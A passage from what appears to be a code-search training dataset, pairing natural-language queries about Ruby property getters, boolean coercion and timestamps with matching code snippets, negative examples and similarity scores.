"0.59407437",
"0.59407437",
"0.59407437",
"0.59407437",
"0.5928931",
"0.5927596",
"0.5923966",
"0.5919632",
"0.5912409",
"0.59002775",
"0.5893556",
"0.589182",
"0.5886879",
"0.5886088",
"0.58786076",
"0.58769864",
"0.58755094",
"0.58755094"
] | 0.0 | -1 |
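To make the Aspire::Object initializer above concrete, here is a runnable sketch of the collaboration it depends on. FakeFactory and FakeCache are invented stand-ins: the real Aspire factory exposes a cache whose linked_data_url knows the tenancy's canonical URL scheme, which this toy version only approximates.

class FakeCache
  # Toy normalisation: force the scheme and strip a trailing slash.
  def linked_data_url(uri)
    uri.sub(%r{\Ahttps://}, 'http://').chomp('/')
  end
end

class FakeFactory
  def cache
    @cache ||= FakeCache.new
  end
end

class AspireObject
  attr_accessor :factory, :uri

  def initialize(uri, factory)
    self.factory = factory
    # With no factory there is nothing to normalise against, so keep the raw URI.
    self.uri = factory ? factory.cache.linked_data_url(uri) : uri
  end
end

obj = AspireObject.new('https://example.com/items/123/', FakeFactory.new)
puts obj.uri # => http://example.com/items/123
puts AspireObject.new('https://example.com/items/123/', nil).uri # unchanged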
Returns a Boolean property value | def get_boolean(property, data, single: true)
get_property(property, data, single: single) do |value, _type|
value ? true : false
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def bool_property(name)\n val = property(name)\n (val && val == 'true')\n end",
"def get_boolean_value\n\t\tend",
"def value\n true\n end",
"def value\n return @value unless @value.nil?\n @value = value_dec == :bool_value_true\n @value\n end",
"def get_boolean_value(field_name)\n\t\tend",
"def make_boolean_property(property, method)\n define_method(method) do\n if !self[property].nil?\n 'true' == self[property].downcase\n else\n false\n end\n end\n end",
"def value_if_true\n return @value_if_true\n end",
"def property?(name); end",
"def boolean\n Util.from_bytes :boolean, value\n end",
"def boolean_type\n 'Boolean'\n end",
"def to_bool() true end",
"def to_bool\n true\n end",
"def to_bool; self; end",
"def to_bool; self; end",
"def true?\n self.value == '1'\n end",
"def get_property(attribute)\n `var el=this.__native__,attr=attribute.__value__,key=c$Element.__keyed_attributes__[attr],bool=c$Element.__boolean_attributes__[attr]`\n `var value=key||bool?el[key||bool]:el.getAttribute(attr,2)`\n return `bool ? !!value : (value==null) ? nil : $q(value)`\n end",
"def boolean_value(object)\n\treturn object if object.is_a?(PRBool)\n\treturn PRBool.new(false) if object.is_a?(PRNil)\n\tif object.is_a?(PRNumber) then\n\t\treturn PRBool.new(object._value != 0)\n\tend\n\treturn PRBool.new(true)\nend",
"def is_propvalue?(); @type == GRT_PROPVALUE; end",
"def to_bool\n true\n end",
"def boolean(**props)\n transform(type: :boolean, **props) do |value|\n !!value\n end\n end",
"def true?\n self.value == '1'\n end",
"def literal_true\n BOOL_TRUE\n end",
"def boolean(value)\n value ? true : false\n end",
"def boolean\n map ->(primitive) { primitive.to_bool }\n end",
"def to_bool\n is_a?(::TrueClass) || self == :true || self == :yes || self == :on\n end",
"def attr_get_boolean(attr_type, strict = true)\n #This is a stub, used for indexing\n end",
"def typus_boolean(attribute = :default)\n options = read_model_config['fields']['options']\n\n boolean = if options && options['booleans'] && boolean = options['booleans'][attribute.to_s]\n boolean.is_a?(String) ? boolean.extract_settings : boolean\n else\n [\"True\", \"False\"]\n end\n\n [[boolean.first, \"true\"], [boolean.last, \"false\"]]\n end",
"def boolean_attribute?(name) \n BOOLEAN_ATTRIBUTES.include?(name.to_s)\n end",
"def config_boolean_true?(boolean_field)\n data[boolean_field].to_i == 1\n end",
"def single_value?\n @single_value\n end",
"def is_boolean()\n res = super(context,self)\n return res\n end",
"def boolean_attributes\n @boolean_attributes\n end",
"def default_X__PROPERTY_BOOL__X\n config_get_default('X__RESOURCE_NAME__X', 'X__PROPERTY_BOOL__X')\n end",
"def true \n \"true\" \n end",
"def boolean?\n @type == :boolean\n end",
"def literal_true\n 'true'\n end",
"def true?\n self.eql?(true)\n end",
"def boolean?\n !@arg[:boolValue].nil?\n end",
"def checked?\n @value\n end",
"def test?\n value_for('test') == 'true'\n end",
"def boolean\n any(true, false)\n end",
"def value_type?\n @property.value_type?\n end",
"def value?\n return !self.flag?\n end",
"def to_boolean\n inner_html == 'true'\n end",
"def result\n val = value.sub(/^boolean-/, '')\n val.casecmp(\"true\").zero?\n end",
"def to_bool() false end",
"def read_bool; end",
"def get_boolean_field(field_name)\n\t\tend",
"def to_bool(value)\n ActiveModel::Type::Boolean.new.cast(value.to_s.strip)\n end",
"def value_if_false\n return @value_if_false\n end",
"def boolval \n\n\t$cst.add_branch(\"boolval\")\n\n\tmatch_token(\"T_BOOLEAN\", $tokens[$index])\n\t\n\t$cst.ascend\n\nend",
"def output_value(key)\n if self.class.boolean_attributes.include?(key)\n (@attributes[key] ? \"yes\" : \"no\")\n else\n @attributes[key]\n end\n end",
"def bool()\n val = _int32(\"bool\")\n\n case val\n when 0\n false\n when 1\n true\n else\n raise ArgumentError, \"Invalid value for bool: #{val}\"\n end\n end",
"def define_property(property, value)\n define_singleton_method(property) { value }\n\n if value == true || value == false\n define_singleton_method(\"#{property}?\") { value }\n end\n end",
"def single_value?\n return false\n end",
"def is_value?\n true\n end",
"def boolean_field_value_for_name(name)\n return boolean_fields[name.to_s][\"value\"].to_i if boolean_fields[name.to_s]\n return BOOLEAN_VALUE_FOR_ALL # if no name found\n end",
"def to_boolean(value)\n case value\n when :true, 'true'\n true\n else\n false\n end\n end",
"def to_boolean()\n res = super(context,self)\n return res\n end",
"def value_if_true=(value)\n @value_if_true = value\n end",
"def to_bool\n return true if ['true', '1', 'yes', 'on', 't'].include? self\n return false if ['false', '0', 'no', 'off', 'f'].include? self\n return false\n end",
"def to_bool\n return false if self.downcase == \"false\"\n return true\n end",
"def property?(prop_name)\n return false if properties_info[prop_name.to_sym].nil?\n properties_info[prop_name.to_sym][:defined] == true\n end",
"def value?(value) true end",
"def true?\n self == true\n end",
"def checkbox_value\n show\n # return 'true' if show\n # 'false'\n end",
"def typus_boolean(attribute = 'default')\n boolean = Typus::Configuration.config[self.name]['fields']['options']['booleans'][attribute] rescue nil\n boolean = \"true, false\" if boolean.nil?\n return { :true => boolean.split(', ').first.humanize, \n :false => boolean.split(', ').last.humanize }\n end",
"def display_boolean(value)\n value == \"true\" ? \"Yes\" : \"No\"\n end",
"def to_bool\n if (self.to_bool == 1)\n puts \"TRUE\"\n elsif (self.to_bool == 0)\n puts \"FALSE\"\n elsif (self.to_bool == -1)\n puts \"NaN\"\n end\nend",
"def literal_false\n BOOL_FALSE\n end",
"def property?(prop_name)\n return false if properties_info[prop_name.to_sym].nil?\n properties_info[prop_name.to_sym][:defined] == true\n end",
"def property?(name)\n raw.key? name\n end",
"def boolify(val)\n\nend",
"def boolean?\n !to_bool.nil?\n end",
"def boolean?\n type == \"BOOLEAN\" || type == \"BOOL\"\n end",
"def get_boolean value #:nodoc:\n # some exceptions\n value = false if value == :low or value == 0 or value == nil or value == :off or value == :ground or value == :gnd\n !! value # double invert value in to boolean form\n end",
"def to_bool\n !!self\n end",
"def hasValue\n @valueCreator.hasValue\n end",
"def property?(key)\n has_property?(key.to_s)\n end",
"def attribute?\n false\n end",
"def column_value_boolean\n case Utilities.adapter\n when 'mysql2', 'postgresql'\n column_value ? \"true\" : \"false\"\n when 'sqlite3', 'sqlserver'\n column_value ? \"1\" : \"0\"\n end\n end",
"def to_boolean\r\n\t !!(self.to_s =~ /^(true|t|yes|y|1)$/i)\r\n\tend",
"def typecast_value_boolean(opts={});true;end",
"def enabled\n if @property_hash[:enabled].nil?\n :absent\n else\n @property_hash[:enabled]\n end\n end",
"def has_value?\n true\n end",
"def notify_boolean(value)\n value.present? ? 'yes' : 'no'\n end",
"def acwake\n return nil unless @property_hash.has_key? 'acwake'\n return nil unless @property_hash['acwake'] == '0' || @property_hash['acwake'] == '1'\n \n @property_hash['acwake'] == '1' ? :true : :false\n end",
"def toread\n Types::Boolean.deserialize(@toread)\n end",
"def field_value\n checked?\n end",
"def to_bool(value)\n value.to_s.downcase == 'true' ? true : false\n end",
"def to_boolean\n if ['true', 'True', 'TRUE', '1'].include?(self)\n return true\n else\n return false\n end\n end",
"def to_boolean(value)\n [\"true\", \"1\", \"yes\"].include?(value.to_s) ? true : false\n end",
"def infer_boolean bool_property, indicator_properties, atts, default=nil\n atts[bool_property] = default unless (atts[bool_property] or default.nil?)\n indicator_properties.each do |x|\n atts[bool_property] = true unless atts[x].nil?\n end\n return atts\n end",
"def bool_value(value)\n value = @filters[value] if value.is_a? Symbol\n ActiveRecord::Type::Boolean.new.cast(value)\n end",
"def to_cli_boolean(value)\n case value\n when true\n :true\n else\n :false\n end\n end",
"def boolean_type?(resource)\n property = get_resource_property(resource, attribute_name)\n\n property ? property.load_as == TrueClass : false\n end",
"def true?\n !false?\n end",
"def to_boolean(val)\n val && (val.to_s.match(/(true|t|yes|y|1)$/i) != nil)\n end",
"def literal_false\n 'false'\n end",
"def prop(name)\n properties.named(name).first.andand.value\n end"
] | [
"0.8717523",
"0.8130486",
"0.7639224",
"0.7368131",
"0.7304756",
"0.72858953",
"0.7130745",
"0.71062964",
"0.70823854",
"0.70806104",
"0.70732677",
"0.7058283",
"0.7040332",
"0.7040332",
"0.70148027",
"0.69839317",
"0.6981775",
"0.6970699",
"0.6967798",
"0.69629",
"0.6949662",
"0.6892146",
"0.68921065",
"0.6889565",
"0.6873876",
"0.68688977",
"0.6863598",
"0.68497026",
"0.6807683",
"0.68011427",
"0.6786838",
"0.6784786",
"0.678248",
"0.6770719",
"0.67441386",
"0.67342955",
"0.67335135",
"0.6726452",
"0.67140114",
"0.67069215",
"0.6698589",
"0.66713685",
"0.66712946",
"0.6669009",
"0.6665321",
"0.6661011",
"0.6654483",
"0.6649265",
"0.66407716",
"0.66358715",
"0.6619414",
"0.6615432",
"0.66132337",
"0.6604121",
"0.66030735",
"0.6578533",
"0.6563173",
"0.6561158",
"0.65577966",
"0.655683",
"0.6543939",
"0.6541288",
"0.6539885",
"0.65174085",
"0.6511421",
"0.65104777",
"0.6502326",
"0.64963245",
"0.6492959",
"0.6489123",
"0.64874136",
"0.64802235",
"0.64759016",
"0.6470251",
"0.6457401",
"0.64538395",
"0.64497936",
"0.6444201",
"0.64354223",
"0.6433421",
"0.64264125",
"0.64143765",
"0.64132714",
"0.6409342",
"0.64085966",
"0.6402393",
"0.6402252",
"0.6400838",
"0.6397114",
"0.6395396",
"0.6393898",
"0.63837945",
"0.63737905",
"0.6354263",
"0.6347977",
"0.6334049",
"0.63328385",
"0.63316333",
"0.63243926",
"0.6323754"
] | 0.807006 | 2 |
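What makes the get_boolean document above so small is that get_property does the traversal and yields each raw value (with its type) to a coercion block. The sketch below pairs it with a simplified get_property so the pattern runs on its own — the real get_property also resolves URLs and typed values, which is omitted here.

# Simplified stand-in for the real get_property: look the key up, wrap
# scalars in an array, and yield each value to the coercion block.
def get_property(property, data, single: true)
  values = data ? data[property] : nil
  values = [values] unless values.is_a?(Array)
  coerced = values.map { |v| block_given? ? yield(v, nil) : v }
  single ? coerced.first : coerced
end

def get_boolean(property, data, single: true)
  get_property(property, data, single: single) do |value, _type|
    value ? true : false
  end
end

data = { 'isPublished' => 1, 'flags' => [1, nil, 'yes'] }
p get_boolean('isPublished', data)          # => true
p get_boolean('flags', data, single: false) # => [true, false, true]
p get_boolean('missing', data)              # => false (nil coerces to false)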
Returns a DateTime instance for a timestamp property | def get_date(property, data, single: true)
get_property(property, data, single: single) do |value, _type|
DateTime.parse(value)
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def timestamp\n Time.parse( props[ TIMESTAMP_PROP_NAME ] ) if props\n end",
"def timestamp\n timestamp_to_datetime(static_data(\"timestamp\"))\n end",
"def datetime_timestamp\n return Date.parse(self.date).to_time\n end",
"def timestamp\n _timestamp.as_time\n end",
"def timestamp_property(name)\n val = property(name)\n if val && (not val.kind_of? Time)\n val = (not val.empty?) ? Time.parse(val) : nil\n property_cache[name] = val\n end\n val\n end",
"def timestamp\n @timestamp ||= Time.parse(self['timestamp'])\n end",
"def timestamp\n attribute_prop(4)\n end",
"def timestamp\n _timestamp.as_time\n end",
"def timestamp\n Time.at((attributes[:timestamp] || Time.now).to_i)\n end",
"def timestamp\n TimeStamp.new\n end",
"def get_datetime(timestamp)\n t = Time.at(timestamp)\n \"%d-%d-%d %d:%d:%d\" % [t.year, t.month, t.day, t.hour, t.min, t.sec]\n end",
"def new_timestamp # :nodoc:\n @properties['timestamp'].dup\n end",
"def timestamp_to_datetime(timestamp)\n Time.at(timestamp.to_f / 1000.0).utc\n end",
"def timestamp\n self[:timestamp]\n end",
"def timestamp\n @timestamp ||= Time.now.xs_datetime\n end",
"def literal_datetime(v)\n v.strftime(\"TIMESTAMP '%Y-%m-%d %H:%M:%S'\")\n end",
"def timestamp\n @timestamp ||= Time.parse(@origdate)\n end",
"def timestamp\n @timestamp ||= @attributes['timestamp'] ? Time.zone.at(@attributes['timestamp']) : nil\n end",
"def timestamp\n @timestamp ||= @attributes['timestamp'] ? Time.zone.at(@attributes['timestamp']) : nil\n end",
"def type_literal_generic_datetime(column)\n :timestamp\n end",
"def timestamp(value)\n merge(timestamp: value.iso8601)\n end",
"def literal_datetime(v)\n v.strftime(TIMESTAMP_FORMAT)\n end",
"def timestamp\n self.created_at.to_s(:db)\n end",
"def timestamp_to_date(timestamp)\n\t\tTime.at(timestamp/1000).utc #This is a time instance, it should go straight ot ruby\n\tend",
"def timestamp\n mask = class_trait[:timestamp]\n Time.now.strftime(mask || \"%Y-%m-%d %H:%M:%S\")\n end",
"def timestamp\n first(:timestamp)\n end",
"def created_at\n attributes.send(:ts_created) rescue nil\n end",
"def time\n Time.parse(@timestamp)\n end",
"def timestamp \n\ttime = Time.new\n\t\"#{time.day}/#{time.month}/#{time.year}\"\nend",
"def get_date(timestamp)\n get_time(timestamp).to_date\n end",
"def createTimestamp\n result = @@create_date[name]\n result ||= attrs['createTimestamp'][0] rescue nil # in case not loaded\n result ||= ASF.search_one(base, \"uid=#{name}\", 'createTimestamp')[0][0]\n result\n end",
"def timestamp\n DateTime.now.strftime(\"%Y%m%d%H%M%S\")\n end",
"def timestamp() @timestamp ||= Time.now.strftime(\"%Y%m%d%H%M%SZ\") end",
"def time_modified(t=nil)\n if t.nil?\n t = DateTime.now.new_offset(0)\n elsif t.is_a? String\n t = DateTime.parse(t).new_offset(0)\n elsif t.is_a? Time\n t = t.utc\n elsif t.is_a? Date\n t = t.to_datetime.new_offset(0)\n elsif t.is_a? DateTime\n t = t.new_offset(0)\n end\n RDF::Literal.new(t, :datatype => RDF::XSD.dateTime)\n end",
"def to_datetime()\n #This is a stub, used for indexing\n end",
"def datetime_stamp\n Time.now.utc.iso8601\n end",
"def set_for_time timestamp\n return nil unless @date\n case timestamp[0,2]\n when \"00\"\n @datetime.hour == 23 ? @date_add_1_hr : @date\n when \"23\"\n @datetime.hour == 00 ? @date_1_hr_ago : @date\n else\n @date\n end\n end",
"def timestamp_to_time(timestamp)\n Time.at(timestamp.nanos * 10**-9 + timestamp.seconds)\n end",
"def time_based_attribute\n return @time_based_attribute\n end",
"def to_datetime\n @date_time_value\n end",
"def at\n Timestamp.utc(@timestamp_value)\n end",
"def timestamp # :nodoc:\n @timestamp.dup\n end",
"def timestamp=(time)\n @timestamp = time.is_a?(Time) ? time.to_f : time\n end",
"def time_as_timestamp\n date = @date\n if @date.kind_of? String\n date = Date.parse(@date).to_time.to_i\n end\n\n date\n end",
"def timestamp(datetime)\n if datetime.respond_to?(:strftime)\n time_tag(datetime,\n format_date(datetime,\n :format => :full_date,\n :time => true\n ),\n :pubdate => true\n )\n end\n end",
"def timestamp\n time.strftime formatter\n end",
"def create_timestamp\n self.created_at = Time.now\n end",
"def create_timestamp\n self.created_at = Time.now\n end",
"def literal_time(v)\n v.strftime(\"TIMESTAMP '%Y-%m-%d %H:%M:%S'\")\n end",
"def datetime(s)\n @db.to_application_timestamp(s)\n end",
"def timestamp=(timestamp)\n @timestamp = _check_timestamp(timestamp)\n end",
"def timestamp\n return result.created_at\n end",
"def timestamp t\n\n\t\t::Pantheios::Core.timestamp t, nil\n\tend",
"def timestamps!\n key :created_at, Time\n key :updated_at, Time\n class_eval { before_save :update_timestamps }\n end",
"def update_timestamp(*_args)\n current_time = current_time_from_proper_timezone\n\n write_attribute('updated_at', current_time) if respond_to?(:updated_at)\n write_attribute('updated_on', current_time) if respond_to?(:updated_on)\n end",
"def timestamps(opts={})\n @attrs[:created_at] = Attributes::DatetimeAttr.new(:created_at, opts)\n @attrs[:updated_at] = Attributes::DatetimeAttr.new(:updated_at, opts)\n nil\n end",
"def timestamp\n @data['when'].to_time\n end",
"def to_time()\n #This is a stub, used for indexing\n end",
"def timestamp\n #data[\"timestamp\"] as? TimeInterval ?? 0\n timestamp = data[\"timestamp\"]\n timestamp.to_i || 0\n end",
"def timestamp=(timestamp)\n @timestamp = _check_timestamp(timestamp)\n end",
"def timestamp\n nil\n end",
"def to_datetime\n ::DateTime.new(@year, @month, @day, @hour, @minute, @second)\n end",
"def ruby_value\n to_datetime\n end",
"def timestamp\n date.strftime(\"%Y%m%d%H%M%S\") \n end",
"def convert_for_timestamp_shape(arg)\n return nil if arg.nil?\n\n time_value = case arg\n when Time\n arg\n when Date, DateTime\n arg.to_time\n when Integer, Float\n Time.at(arg)\n else\n Time.parse(arg.to_s)\n end\n time_value.utc.iso8601\n end",
"def typecast_value_datetime(value)\n Sequel.typecast_to_application_timestamp(value)\n end",
"def timestamp\n {\n \"u:Timestamp\" => {\n \"u:Created\" => now.xs_datetime,\n \"u:Expires\" => (now + 60 * 5).xs_datetime,\n :order! => [\"u:Created\", \"u:Expires\"],\n },\n :attributes! => { \"u:Timestamp\" => { \"u:Id\" => timestamp_id, \"xmlns:u\" => WSUNamespace } },\n }\n end",
"def to_datetime\n self\n end",
"def to_time\n Chronic.parse self.timestamp\n end",
"def timestamp\n if $jsdb.exist?(@jslib,@jscell)\n $jsdb.get_timestamp(@jslib,@jscell)\n else\n Rake::EARLY\n end\n end",
"def timestamp\n @java.getTimestamp\n end",
"def to_time\n if latest?\n Time.new(10_000, 1, 1)\n elsif timestamp?\n if development?\n self =~ /\\w+_(\\d\\d\\d\\d)_(\\d\\d)_(\\d\\d)_(\\d\\d)_(\\d\\d)$/\n Time.new(Regexp.last_match[1], Regexp.last_match[2], Regexp.last_match[3], Regexp.last_match[4], Regexp.last_match[5])\n else\n self =~ /Rel(\\d\\d\\d\\d)(\\d\\d)(\\d\\d)/\n Time.new(Regexp.last_match[1], Regexp.last_match[2], Regexp.last_match[3])\n end\n else\n fail \"Version tag #{self} cannot be converted to a time!\"\n end\n end",
"def timestamp\n @timestamp ||= Time.now.strftime Savon::SOAP::DateTimeFormat\n end",
"def set_deleted_timestamp(time=nil)\n field = model.deleted_timestamp_field\n meth = :\"#{field}=\"\n if respond_to?(field) && respond_to?(meth) && (model.deleted_timestamp_overwrite? || send(field).nil?)\n self.send(meth, time||=Sequel.datetime_class.now)\n self.save\n end\n end",
"def timestamp; end",
"def timestamp; end",
"def timestamp; end",
"def timestamp; end",
"def timestamp; end",
"def timestamp; end",
"def created_at\n with_type!(Fixnum) { attribute_from_model(:created_at) || attribute_from_model(:created) }\n end",
"def to_datetime\n to_time.to_datetime\n end",
"def timestamps(*attrs)\n if attrs.empty?\n DEFAULT_TIMESTAMPS.each do |t|\n attribute t, DateTime, default: proc { DateTime.now }\n end\n else\n attrs.each do |attr|\n attribute attr, DateTime, default: proc { DateTime.now }\n end\n end\n end",
"def get_timestamp\n Time.now.strftime('%d %B %Y %H:%M')\n end",
"def time\n @time ||= Time.at( timestamp / 1_000_000.0 )\n end",
"def literal_time(v)\n v.strftime(TIMESTAMP_FORMAT)\n end",
"def timestamps(options = {})\n attribute(:created_at, options.update(type: :timestamp))\n attribute(:updated_at, options.update(type: :timestamp))\n end",
"def created_at=(val)\n if val.is_a?(String)\n @created_at = Time.parse(val)\n else\n @created_at = val\n end\n end",
"def timestamps\n opts = @table.schema.opts\n if opts[ :mysql_timestamps ]\n # Unfortunately, MySQL allows only either automatic create timestamp\n # (DEFAULT CURRENT_TIMESTAMP) or automatic update timestamp (DEFAULT\n # CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP), but not both - one\n # has to be updated manually anyway. So we choose to have the update timestamp\n # automatically updated, and let the create one to be set manually.\n # Also, Sequel doesn't currently honor :on_update for column definitions,\n # so we have to use default literal to make it work. Sigh.\n timestamp :create_time, :null => false, :default => ( opts[ :zero_timestamps ] == false ? DEFAULT_TIME : ZERO_TIME )\n timestamp :update_time, :null => false, :default => Sequel.lit( 'CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP' )\n else\n Time :create_time\n Time :update_time\n end\n end",
"def time_for(record)\n return nil unless record\n case database_type\n when :mongo\n return Time.at(record['ts'].seconds)\n when :toku\n return record['ts']\n end\n end",
"def created_at\n return DateTime.parse(@created_at) if @created_at\n\n @created_at\n end",
"def to_time\n value\n end",
"def get_timestamp\n timestamp = Time.now.gmtime\n timestamp = timestamp.strftime(\"%Y-%m-%dT%H:%M:%S.000Z\")\n timestamp.to_s\n end",
"def timestamp(attachment, _style_name)\n attachment.instance_read(:updated_at).in_time_zone(attachment.time_zone).to_s\n end",
"def timestamp\n Time.now.to_s\n end",
"def datetime(name, option={})\n option[:is_a] = :datetime\n register_attribute_member(name, option)\n define_attribute_accessor(name, option)\n define_validations(name, option)\n end",
"def datetime\n new(:datetime, DATE_TIME_REGEXP, lambda { |raw| Time.parse(raw).to_datetime })\n end",
"def timestamps!\n property :created_at\n property :updated_at\n \n before_create :touch_created_at\n before_create :touch_updated_at\n before_save :touch_updated_at\n end",
"def to_timestamp(obj, default = Time.now)\n case obj\n when String then Time.parse(obj)\n when Date then obj.to_time\n when Time then obj\n when Numeric then Time.at(obj)\n else default\n end\n rescue ArgumentError => e\n default\n end",
"def to_timestamp_with_offset\n # Thread-safety: It is possible that the value of @timestamp_with_offset\n # may be calculated multiple times in concurrently executing threads. It\n # is not worth the overhead of locking to ensure that\n # @timestamp_with_offset is only calculated once.\n\n unless @timestamp_with_offset\n time = to_time\n @timestamp_with_offset = TimestampWithOffset.new(time.to_i, time.utc_offset)\n end\n\n @timestamp_with_offset\n end",
"def created_at=(value)\n @created_at = DateTime.parse(value)\n end"
] | [
"0.7321838",
"0.71905166",
"0.7150863",
"0.7128203",
"0.71263605",
"0.7039782",
"0.7027968",
"0.6959805",
"0.69386595",
"0.6847868",
"0.6846435",
"0.68372166",
"0.6700522",
"0.6693689",
"0.662373",
"0.6552022",
"0.653928",
"0.6507476",
"0.6507476",
"0.64569145",
"0.6407585",
"0.6387313",
"0.63795704",
"0.6332905",
"0.6317713",
"0.6301909",
"0.6289453",
"0.62668395",
"0.6216053",
"0.61787766",
"0.61427784",
"0.6097901",
"0.6084047",
"0.60653394",
"0.60375303",
"0.60308105",
"0.6023683",
"0.60162544",
"0.5981967",
"0.5980163",
"0.5977741",
"0.5974562",
"0.59685427",
"0.59633654",
"0.5956148",
"0.5935457",
"0.59299356",
"0.5929214",
"0.59148455",
"0.59078115",
"0.5895964",
"0.5891415",
"0.58910483",
"0.5883393",
"0.5847512",
"0.58034784",
"0.58001685",
"0.5799943",
"0.5799855",
"0.57944983",
"0.5792738",
"0.57856786",
"0.5777555",
"0.57712513",
"0.57706714",
"0.57649624",
"0.57562345",
"0.5754326",
"0.57529384",
"0.5732254",
"0.5709127",
"0.570798",
"0.5696043",
"0.56927943",
"0.56915486",
"0.56915486",
"0.56915486",
"0.56915486",
"0.56915486",
"0.56915486",
"0.5677962",
"0.5677884",
"0.5676219",
"0.5665357",
"0.56628054",
"0.5639369",
"0.5638702",
"0.56358796",
"0.5635018",
"0.56290835",
"0.56269157",
"0.56267893",
"0.56241345",
"0.56211877",
"0.56163615",
"0.56132215",
"0.56023",
"0.559221",
"0.5586169",
"0.5585546",
"0.55836666"
] | 0.0 | -1 |
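The negatives above all converge on one pattern: coercing a heterogeneous input (Time, Date, Integer, String) into a canonical UTC timestamp. A minimal Ruby sketch of that shared pattern, distilled from the snippets (the name coerce_timestamp is illustrative, not taken from any entry):

require 'time'
require 'date'

# Normalise common timestamp representations to a UTC ISO 8601 string.
# Strings fall through to Time.parse; nil input stays nil.
def coerce_timestamp(arg)
  return nil if arg.nil?

  time = case arg
         when Time then arg
         when Date, DateTime then arg.to_time
         when Integer, Float then Time.at(arg)
         else Time.parse(arg.to_s)
         end
  time.utc.iso8601
end

coerce_timestamp(0) # => "1970-01-01T00:00:00Z"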
Returns the value of a property | def get_property(property, data, is_url: false, single: true, &block)
  # Look up the raw value(s); missing data yields nil
  values = data ? data[property] : nil
  if values.is_a?(Array)
    # Multi-valued property: transform every element
    values = values.map do |value|
      get_property_value(value, is_url: is_url, &block)
    end
    # Honour the single flag: first element or the full list
    single ? values[0] : values
  else
    # Single-valued (or nil) property: transform and wrap as requested
    value = get_property_value(values, is_url: is_url, &block)
    single ? value : [value]
  end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def get_property(property)\n get_compound_value(get_value(property))\n end",
"def value\n @property_hash[:value]\n end",
"def get_property _property\n send_cmd(\"get_property #{_property}\")\n end",
"def get_property(property_name)\n value = get() and value[property_name]\n end",
"def property\n @property\n end",
"def [](property_name)\n properties[property_name.to_s].value\n end",
"def get_value(property)\n if @env_properties.get_value(property)\n return @env_properties.get_value(property)\n end\n @file_properties.get_value(property)\n end",
"def prop(name)\n properties.named(name).first.andand.value\n end",
"def get(property)\n self.send(property.to_sym)\n end",
"def get_value(property_path)\n element = @tree.select(property_path)[0]\n element.nil? ? nil : element.value\n end",
"def get_property_value(name)\n property = get_property(name)\n \n # Throw error if property doesn't exist\n if property.nil?\n raise StandardError.new(\"Property does not exist: #{name}\")\n end\n\n # Return the property value\n property.get_value(self)\n end",
"def get_property(key)\n self.fetch key\n end",
"def get_property(name)\n return @properties[name]\n end",
"def get_property(*args)\n return unless alive?\n\n command(\"get_property\", *args)[\"data\"]\n end",
"def property(name)\n get(\"/session/#{session_id}/element/#{element_id}/property/#{name}\").value\n end",
"def property(name)\n @property_hash[name]\n end",
"def get_property(key)\n @data[key]\n end",
"def get_raw_property_value(name)\n return @property_values[name]\n end",
"def get_property(property_name)\n command(\"get_property\", property_name)\n end",
"def _property(p_name)\n __t_stringish(p_name)\n _jinja.properties[__attribute_key(p_name)]\n end",
"def get_property(name)\n $NEO_LOGGER.debug{\"get property '#{name}'\"}\n \n return nil if ! property?(name)\n value = @internal_node.get_property(name.to_s)\n if self.class.marshal?(name)\n Marshal.load(String.from_java_bytes(value))\n else\n value\n end\n end",
"def get_property(property)\n rows = weather_properties.select do |row|\n row.header.text.downcase == property\n end\n\n return nil if rows.empty?\n\n rows.first.value.text\n end",
"def [](property)\n data[property]\n end",
"def get_property!(node, name)\n value = node.xpath(name).text\n raise \"missing property '#{name}' in node: #{node}\" if value.empty?\n value\n end",
"def intersys_get(property)\n intersys_property(property).get\n end",
"def get(property_name)\n result.key?(property_name) ? result[property_name][1] : nil\n end",
"def get_property(property_id, options={})\n return send_message(SkyDB::Message::GetProperty.new(property_id, options))\n end",
"def get_property(prop)\r\n prop = URI.parse(prop) unless prop.is_a?(URI)\r\n\r\n each_property{|predicate, object|\r\n return object if predicate == prop\r\n }\r\n nil\r\n end",
"def property(name); end",
"def get_property\n @xml = client.call(url).parsed_response.css('property').first\n @attributes.merge!(parse_xml_to_hash)\n end",
"def get(key)\n properties[key]\n end",
"def get_property(property_name)\n function = <<~JAVASCRIPT\n (object, propertyName) => {\n const result = {__proto__: null};\n result[propertyName] = object[propertyName];\n return result;\n }\n JAVASCRIPT\n object_handle = execution_context.evaluate_handle_function(function, self, property_name).value!\n properties = object_handle.get_properties\n result = properties[property_name]\n object_handle.dispose\n result\n end",
"def property_name\n property.name if property\n end",
"def value\n send property.type_field\n end",
"def get_property(ctx,object,propertyName,exception)\n JS::Lib.JSObjectGetProperty(ctx,object,propertyName,exception)\n end",
"def get_property( propname )\n resp = conn.get('/users/'+name+'/props/'+propname+'/')\n \n case resp.code.to_i\n when 200\n return JSON.parse( resp.body )\n when 404\n case resp.header['resource-type']\n when 'user'\n raise RestAuthUserNotFound.new( resp )\n when 'property'\n raise RestAuthPropertyNotFound.new( resp )\n else\n raise RestAuthBadResponse.new( resp, \"Received 404 without Resource-Type header\" )\n end\n else\n raise RestAuthUnknownStatus.new( resp )\n end\n end",
"def get\n @value\n end",
"def property_name\n property.identifing_name\n end",
"def property property\n\t\tret = '@property '\n\n\t\tcase property.type\n\t\twhen 'int' then ret << '(nonatomic) int '\n\t\twhen 'bool' then ret << '(nonatomic) BOOL '\n\t\twhen 'flt' then ret << '(nonatomic) float '\n\t\twhen 'str' then ret << '(strong, nonatomic) NSString * '\n\t\twhen 'arr' then ret << '(strong, nonatomic) NSArray * '\n\t\twhen 'dict' then ret << '(strong, nonatomic) NSDictionary * '\n\t\telse\n\t\t\t#fallthrough: a custom object was provided\n\t\t\tret << \"(strong, nonatomic) #{property.type} * \"\n\t\tend\n\n\t\tret << property.name << \";\\n\"\n\t\tret\n\tend",
"def getProperty(propName)\n begin\n elementObject = waitForObject(@symbolicName, OBJECT_WAIT_TIMEOUT)\n @properties = Squish::Object.properties(elementObject)\n\n if @properties[propName]\n return @properties[propName]\n else\n # Property does not exist\n return nil\n end\n rescue Exception => e\n Log.TestFail(\"#{self.class.name}::#{__method__}(): \" + @symbolicName + \": \" + e.message)\n end\n end",
"def property(value)\n merge(property: value.to_s)\n end",
